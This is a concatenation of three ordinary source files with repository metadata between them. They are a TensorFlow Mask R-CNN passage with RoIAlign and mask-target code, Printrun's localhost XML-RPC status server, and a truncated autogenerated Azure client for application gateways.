feats, box_rois, num_classes=params['num_classes'],
mrcnn_resolution=params['mrcnn_resolution'])
return mask_outputs
return fpn_feats, rpn_fn, faster_rcnn_fn, mask_rcnn_fn
def remove_variables(variables, resnet_depth=50):
"""Removes low-level variables from the input.
Removing low-level parameters (e.g., initial convolution layer) from training
usually leads to higher training speed and slightly better testing accuracy.
The intuition is that the low-level architecture (e.g., ResNet-50) is able to
capture low-level features such as edges; therefore, it does not need to be
fine-tuned for the detection task.
Args:
variables: all the variables in training
resnet_depth: the depth of ResNet model
Returns:
var_list: a list containing variables for training
"""
# Freeze at conv2 based on reference model.
# Reference: https://github.com/ddkang/Detectron/blob/80f329530843e66d07ca39e19901d5f3e5daf009/lib/modeling/ResNet.py # pylint: disable=line-too-long
remove_list = []
prefix = 'resnet{}/'.format(resnet_depth)
remove_list.append(prefix + 'conv2d/')
remove_list.append(prefix + 'batch_normalization/')
for i in range(1, 11):
remove_list.append(prefix + 'conv2d_{}/'.format(i))
remove_list.append(prefix + 'batch_normalization_{}/'.format(i))
def _is_kept(variable):
for rm_str in remove_list:
if rm_str in variable.name:
return False
return True
var_list = [v for v in variables if _is_kept(v)]
return var_list
def get_mask_targets(fg_boxes, fg_proposal_to_label_map, fg_box_targets,
mask_gt_labels, output_size=28):
"""Crop and resize on multilevel feature pyramid.
Args:
fg_boxes: A 3-D tensor of shape [batch_size, num_masks, 4]. Each row
represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
fg_proposal_to_label_map: A tensor of shape [batch_size, num_masks].
fg_box_targets: a float tensor representing the box label for each box
with a shape of [batch_size, num_masks, 4].
mask_gt_labels: A tensor with a shape of [batch_size, M, H+4, W+4]. M is
NUM_MAX_INSTANCES (i.e., 100 in this implementation) in each image, while
H and W are ground truth mask size. The `+4` comes from padding of two
zeros in both directions of height and width dimension.
output_size: A scalar to indicate the output crop size.
Returns:
A 4-D tensor representing feature crop of shape
[batch_size, num_boxes, output_size, output_size].
"""
# TODO(chiachenc): this function is embarassingly similar to
# `multilevel_crop_and_resize`. Two functions shall be refactored.
with tf.name_scope('get_mask_targets'):
(batch_size, num_instances, max_feature_height,
max_feature_width) = mask_gt_labels.get_shape().as_list()
_, num_masks = fg_proposal_to_label_map.get_shape().as_list()
features_all = mask_gt_labels
height_dim_size = max_feature_width
level_dim_size = max_feature_height * height_dim_size
batch_dim_size = num_instances * level_dim_size
# proposal_to_label_map might have a -1 paddings.
levels = tf.maximum(fg_proposal_to_label_map, 0)
# Projects box location and sizes to corresponding cropped ground truth
# mask coordinates.
bb_y_min, bb_x_min, bb_y_max, bb_x_max = tf.split(
value=fg_boxes, num_or_size_splits=4, axis=2)
gt_y_min, gt_x_min, gt_y_max, gt_x_max = tf.split(
value=fg_box_targets, num_or_size_splits=4, axis=2)
valid_feature_width = max_feature_width - 4
valid_feature_height = max_feature_height - 4
y_transform = (bb_y_min - gt_y_min) * valid_feature_height / (
gt_y_max - gt_y_min + _EPSILON) + 2
x_transform = (bb_x_min - gt_x_min) * valid_feature_width / (
gt_x_max - gt_x_min + _EPSILON) + 2
h_transform = (bb_y_max - bb_y_min) * valid_feature_height / (
gt_y_max - gt_y_min + _EPSILON)
w_transform = (bb_x_max - bb_x_min) * valid_feature_width / (
gt_x_max - gt_x_min + _EPSILON)
# Compute y and x coordinate indices.
box_grid_x = []
box_grid_y = []
for i in range(output_size):
box_grid_x.append(x_transform + (0.5 + i) * w_transform / output_size)
box_grid_y.append(y_transform + (0.5 + i) * h_transform / output_size)
box_grid_x = tf.stack(box_grid_x, axis=2)
box_grid_y = tf.stack(box_grid_y, axis=2)
box_grid_y0 = tf.floor(box_grid_y)
box_grid_x0 = tf.floor(box_grid_x)
# Compute indices for gather operation.
box_gridx0x1 = tf.stack([box_grid_x0, box_grid_x0 + 1], axis=3)
box_gridy0y1 = tf.stack([box_grid_y0, box_grid_y0 + 1], axis=3)
# Check boundary.
box_gridx0x1 = tf.minimum(
tf.to_float(max_feature_width-1), tf.maximum(0., box_gridx0x1))
box_gridy0y1 = tf.minimum(
tf.to_float(max_feature_height-1), tf.maximum(0., box_gridy0y1))
x_indices = tf.cast(
tf.reshape(box_gridx0x1,
[batch_size, num_masks, output_size * 2]), dtype=tf.int32)
y_indices = tf.cast(
tf.reshape(box_gridy0y1,
[batch_size, num_masks, output_size * 2]), dtype=tf.int32)
indices = tf.reshape(
tf.tile(tf.reshape(tf.range(batch_size) * batch_dim_size,
[batch_size, 1, 1, 1]),
[1, num_masks, output_size * 2, output_size * 2]) +
tf.tile(tf.reshape(levels * level_dim_size,
[batch_size, num_masks, 1, 1]),
[1, 1, output_size * 2, output_size * 2]) +
tf.tile(tf.reshape(y_indices * height_dim_size,
[batch_size, num_masks, output_size * 2, 1]),
[1, 1, 1, output_size * 2]) +
tf.tile(tf.reshape(x_indices,
[batch_size, num_masks, 1, output_size * 2]),
[1, 1, output_size * 2, 1]), [-1])
features_r2 = tf.reshape(features_all, [-1, 1])
features_per_box = tf.reshape(
tf.gather(features_r2, indices),
[batch_size, num_masks, output_size * 2, output_size * 2])
# The RoIAlign feature f can be computed by bilinear interpolation of four
# neighboring feature points f0, f1, f2, and f3.
# f(y, x) = [hy, ly] * [[f00, f01], * [hx, lx]^T
# [f10, f11]]
# f(y, x) = (hy*hx)f00 + (hy*lx)f01 + (ly*hx)f10 + (lx*ly)f11
# f(y, x) = w00*f00 + w01*f01 + w10*f10 + w11*f11
ly = box_grid_y - box_grid_y0
lx = box_grid_x - box_grid_x0
hy = 1.0 - ly
hx = 1.0 - lx
kernel_x = tf.reshape(tf.stack([hx, lx], axis=3),
[batch_size, num_masks, 1, output_size*2])
kernel_y = tf.reshape(tf.stack([hy, ly], axis=3),
[batch_size, num_masks, output_size*2, 1])
# Use implicit broadcast to generate the interpolation kernel. The
# multiplier `4` is for avg pooling.
interpolation_kernel = kernel_y * kernel_x * 4
# Interpolate the gathered features with computed interpolation kernels.
features_per_box *= tf.cast(interpolation_kernel,
dtype=features_per_box.dtype)
features_per_box = tf.transpose(features_per_box, perm=[0, 2, 3, 1])
features_per_box = tf.nn.avg_pool(
features_per_box, [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
features_per_box = tf.transpose(features_per_box, perm=[0, 3, 1, 2])
# Masks are binary outputs.
features_per_box = tf.where(
tf.greater_equal(features_per_box, 0.5), tf.ones_like(features_per_box),
tf.zeros_like(features_per_box))
# mask_targets depend on box RoIs, which have gradients. This stop_gradient
# prevents the flow of gradient to box RoIs.
features_per_box = tf.stop_gradient(features_per_box)
return features_per_box
def multilevel_crop_and_resize(features, boxes, output_size=7):
"""Crop and resize on multilevel feature pyramid.
Following the ROIAlign technique (see https://arxiv.org/pdf/1703.06870.pdf,
figure 3 for reference), we want to sample pixel level feature information
from our feature map at the box boundaries. For each feature map, we select
an (output_size, output_size) set of pixels corresponding to our box
location, and then use bilinear interpolation to select the feature value
for each pixel.
For performance, we perform the gather and interpolation on all layers as a
single operation. This is op the multi-level features are first stacked and
gathered into [2*output_size, 2*output_size] feature points. Then bilinear
interpolation is performed on the gathered feature points to generate
[output_size, output_size] RoIAlign feature map.
Here is the step-by-step algorithm:
1. Pad all multi-level features to a fixed spatial dimension and stack them
into a Tensor of shape [batch_size, level, height, width, num_filters].
2. The multi-level features are then gathered into a
[batch_size, num_boxes, output_size*2, output_size*2, num_filters]
Tensor. The Tensor contains four neighboring feature points for each
vertice in the output grid.
Instead of performing gather operation in one-step, a two-step gather
algorithm is performed. First, the Tensor containining multi-level
features is gathered into
[batch_size, num_boxes, output_size*2, width, num_filters].
Then the tensor is transposed to
[batch_size, num_boxes, width, output_size*2, num_filters]
then gathered to
[batch_size, num_boxes, output_size*2, output_size*2, num_filters].
The 2-step gather algorithm makes sure each gather operation performs on
large contiguous memory.
3. Compute the interpolation kernel of shape
[batch_size, num_boxes, output_size*2, output_size*2]. The last 2 axis
can be seen as stacking 2x2 interpolation kernels for all vertices in the
output grid.
4. Element-wise multiply the gathered features and interpolation kernel.
Then apply 2x2 average pooling to reduce spatial dimension to
output_size.
Args:
features: A dictionary with key as pyramid level and value as features.
The features are in shape of [batch_size, height_l, width_l, num_filters].
boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
output_size: A scalar to indicate the output crop size.
Returns:
A 5-D tensor representing feature crop of shape
[batch_size, num_boxes, output_size, output_size, num_filters].
"""
with tf.name_scope('multilevel_crop_and_resize'):
levels = features.keys()
min_level = min(levels)
max_level = max(levels)
(batch_size, max_feature_height,
max_feature_width, num_filters) = features[min_level].get_shape().as_list()
_, num_boxes, _ = boxes.get_shape().as_list()
# Stack feature pyramid into a features_all of shape
# [batch_size, levels, height, width, num_filters].
features_all = []
for level in range(min_level, max_level + 1):
features_all.append(tf.image.pad_to_bounding_box(
features[level], 0, 0, max_feature_height, max_feature_width))
features_all = tf.stack(features_all, axis=1)
height_dim_size = max_feature_width
level_dim_size = max_feature_height * height_dim_size
batch_dim_size = len(levels) * level_dim_size
# Assign boxes to the right level.
box_width = boxes[:, :, 3] - boxes[:, :, 1]
box_height = boxes[:, :, 2] - boxes[:, :, 0]
areas_sqrt = tf.sqrt(box_height * box_width)
levels = tf.cast(tf.floordiv(tf.log(tf.div(areas_sqrt, 224.0)),
tf.log(2.0)) + 4.0, dtype=tf.int32)
# Map levels between [min_level, max_level].
levels = tf.minimum(max_level, tf.maximum(levels, min_level))
# Project box location and sizes to corresponding feature levels.
scale_to_level = tf.cast(
tf.pow(tf.constant(2.0), tf.cast(levels, tf.float32)),
dtype=boxes.dtype)
boxes /= tf.expand_dims(scale_to_level, axis=2)
box_width /= scale_to_level
box_height /= scale_to_level
# Map levels to [0, max_level-min_level].
levels -= min_level
# Compute y and x coordinate indices.
box_grid_x = []
box_grid_y = []
for i in range(output_size):
box_grid_x.append(boxes[:, :, 1] + (i + 0.5) * box_width / output_size)
box_grid_y.append(boxes[:, :, 0] + (i + 0.5) * box_height / output_size)
box_grid_x = tf.stack(box_grid_x, axis=2)
box_grid_y = tf.stack(box_grid_y, axis=2)
box_grid_y0 = tf.floor(box_grid_y)
box_grid_x0 = tf.floor(box_grid_x)
# Compute indices for gather operation.
box_grid_x0 = tf.maximum(0., box_grid_x0)
box_grid_y0 = tf.maximum(0., box_grid_y0)
boundary = tf.cast(
tf.expand_dims([[tf.cast(max_feature_width, tf.float32)]] / tf.pow(
[[2.0]], tf.cast(levels, tf.float32)) - 1, 2), box_grid_x0.dtype)
box_gridx0x1 = tf.stack([
tf.minimum(box_grid_x0, boundary),
tf.minimum(box_grid_x0 + 1, boundary)
],
axis=3)
box_gridy0y1 = tf.stack([
tf.minimum(box_grid_y0, boundary),
tf.minimum(box_grid_y0 + 1, boundary)
],
axis=3)
x_indices = tf.cast(
tf.reshape(box_gridx0x1,
[batch_size, num_boxes, output_size * 2]), dtype=tf.int32)
y_indices = tf.cast(
tf.reshape(box_gridy0y1,
[batch_size, num_boxes, output_size * 2]), dtype=tf.int32)
indices = tf.reshape(
tf.tile(tf.reshape(tf.range(batch_size) * batch_dim_size,
[batch_size, 1, 1, 1]),
[1, num_boxes, output_size * 2, output_size * 2]) +
tf.tile(tf.reshape(levels * level_dim_size,
[batch_size, num_boxes, 1, 1]),
[1, 1, output_size * 2, output_size * 2]) +
tf.tile(tf.reshape(y_indices * height_dim_size,
[batch_size, num_boxes, output_size * 2, 1]),
[1, 1, 1, output_size * 2]) +
tf.tile(tf.reshape(x_indices,
[batch_size, num_boxes, 1, output_size * 2]),
[1, 1, output_size * 2, 1]), [-1])
features_r2 = tf.reshape(features_all, [-1, num_filters])
features_per_box = tf.reshape(
tf.gather(features_r2, indices),
[batch_size, num_boxes, output_size * 2, output_size * 2, num_filters])
# The RoIAlign feature f can be computed by bilinear interpolation of four
# neighboring feature points f0, f1, f2, and f3.
# f(y, x) = [hy, ly] * [[f00, f01], * [hx, lx]^T
# [f10, f11]]
# f(y, x) = (hy*hx)f00 + (hy*lx)f01 + (ly*hx)f10 + (lx*ly)f11
# f(y, x) = w00*f00 + w01*f01 + w10*f10 + w11*f11
ly = box_grid_y - box_grid_y0
lx = box_grid_x - box_grid_x0
hy = 1.0 - ly
hx = 1.0 - lx
kernel_x = tf.reshape(tf.stack([hx, lx], axis=3),
[batch_size, num_boxes, 1, output_size*2])
kernel_y = tf.reshape(tf.stack([hy, ly], axis=3),
[batch_size, num_boxes, output_size*2, 1])
# Use implicit broadcast to generate the interpolation kernel. The
# multiplier `4` is for avg pooling.
interpolation_kernel = kernel_y * kernel_x * 4
# Interpolate the gathered features with computed interpolation kernels.
features_per_box *= tf.cast(
tf.expand_dims(interpolation_kernel, axis=4),
dtype=features_per_box.dtype)
features_per_box = tf.reshape(
features_per_box,
[batch_size * num_boxes, output_size*2, output_size*2, num_filters])
features_per_box = tf.nn.avg_pool(
features_per_box, [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
features_per_box = tf.reshape(
features_per_box,
[batch_size, num_boxes, output_size, output_size, num_filters])
return features_per_box
| {
"content_hash": "53b4b96483140e516c6046dc6d571ffd",
"timestamp": "",
"source": "github",
"line_count": 1835,
"max_line_length": 181,
"avg_line_length": 42.23978201634878,
"alnum_prop": 0.6402399690362534,
"repo_name": "mlperf/training_results_v0.5",
"id": "02fe59ed78cd478b9d4e18a5649331f190a28502",
"size": "78199",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "v0.5.0/google/cloud_v2.8/gnmt-tpuv2-8/code/gnmt/model/staging/models/rough/mask_rcnn/mask_rcnn_architecture.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5720"
},
{
"name": "C++",
"bytes": "1288180"
},
{
"name": "CMake",
"bytes": "40880"
},
{
"name": "CSS",
"bytes": "32420"
},
{
"name": "Cuda",
"bytes": "1362093"
},
{
"name": "Dockerfile",
"bytes": "19488"
},
{
"name": "Go",
"bytes": "1088660"
},
{
"name": "HTML",
"bytes": "19756888"
},
{
"name": "Java",
"bytes": "45405"
},
{
"name": "JavaScript",
"bytes": "302838"
},
{
"name": "Jupyter Notebook",
"bytes": "9104667"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "Makefile",
"bytes": "3652"
},
{
"name": "Python",
"bytes": "31508548"
},
{
"name": "Scala",
"bytes": "106211"
},
{
"name": "Shell",
"bytes": "409745"
}
],
"symlink_target": ""
} |
from SimpleXMLRPCServer import SimpleXMLRPCServer
from threading import Thread
import socket
import logging
from .utils import install_locale, parse_temperature_report
install_locale('pronterface')
RPC_PORT = 7978
class ProntRPC(object):
server = None
def __init__(self, pronsole, port = RPC_PORT):
self.pronsole = pronsole
used_port = port
while True:
try:
self.server = SimpleXMLRPCServer(("localhost", used_port),
allow_none = True,
logRequests = False)
if used_port != port:
logging.warning(_("RPC server bound on non-default port %d") % used_port)
break
except socket.error as e:
if e.errno == 98:
used_port += 1
continue
else:
raise
self.server.register_function(self.get_status, 'status')
self.thread = Thread(target = self.run_server)
self.thread.start()
def run_server(self):
self.server.serve_forever()
def shutdown(self):
self.server.shutdown()
self.thread.join()
def get_status(self):
if self.pronsole.p.printing:
progress = 100 * float(self.pronsole.p.queueindex) / len(self.pronsole.p.mainqueue)
elif self.pronsole.sdprinting:
progress = self.percentdone
else: progress = None
if self.pronsole.p.printing or self.pronsole.sdprinting:
eta = self.pronsole.get_eta()
else:
eta = None
if self.pronsole.tempreadings:
temps = parse_temperature_report(self.pronsole.tempreadings)
else:
temps = None
z = self.pronsole.curlayer
return {"filename": self.pronsole.filename,
"progress": progress,
"eta": eta,
"temps": temps,
"z": z,
}
| {
"content_hash": "d47cb92caf636c0758d5d50a0cdfe279",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 95,
"avg_line_length": 32.42857142857143,
"alnum_prop": 0.5345080763582967,
"repo_name": "Autonomi/limn",
"id": "8bdd5aec560836c2e3d9ca2ef9c9121d96be4265",
"size": "2711",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "Printrun/printrun/rpc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "127219"
},
{
"name": "C",
"bytes": "16589807"
},
{
"name": "C++",
"bytes": "18789673"
},
{
"name": "CSS",
"bytes": "8345"
},
{
"name": "Eagle",
"bytes": "2655951"
},
{
"name": "HTML",
"bytes": "4387"
},
{
"name": "JavaScript",
"bytes": "95080"
},
{
"name": "Makefile",
"bytes": "77842"
},
{
"name": "Objective-C",
"bytes": "26332"
},
{
"name": "Perl",
"bytes": "320940"
},
{
"name": "Perl6",
"bytes": "12640"
},
{
"name": "PostScript",
"bytes": "68594"
},
{
"name": "Processing",
"bytes": "501066"
},
{
"name": "Prolog",
"bytes": "43"
},
{
"name": "Python",
"bytes": "660383"
},
{
"name": "Scilab",
"bytes": "10211"
},
{
"name": "Shell",
"bytes": "107651"
},
{
"name": "nesC",
"bytes": "984564"
}
],
"symlink_target": ""
} |
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ApplicationGatewaysOperations(object):
"""ApplicationGatewaysOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-01"
self.config = config
def _delete_initial(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
def get(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
"""Gets the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ApplicationGateway or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_11_01.models.ApplicationGateway or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
def _create_or_update_initial(
self, resource_group_name, application_gateway_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ApplicationGateway')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGateway', response)
if response.status_code == 201:
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, application_gateway_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param parameters: Parameters supplied to the create or update
application gateway operation.
:type parameters:
~azure.mgmt.network.v2017_11_01.models.ApplicationGateway
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ApplicationGateway or
ClientRawResponse<ApplicationGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
def _update_tags_initial(
self, resource_group_name, application_gateway_name, tags=None, custom_headers=None, raw=False, **operation_config):
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_tags(
self, resource_group_name, application_gateway_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates the specified application gateway tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ApplicationGateway or
ClientRawResponse<ApplicationGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all application gateways in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ApplicationGateway
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
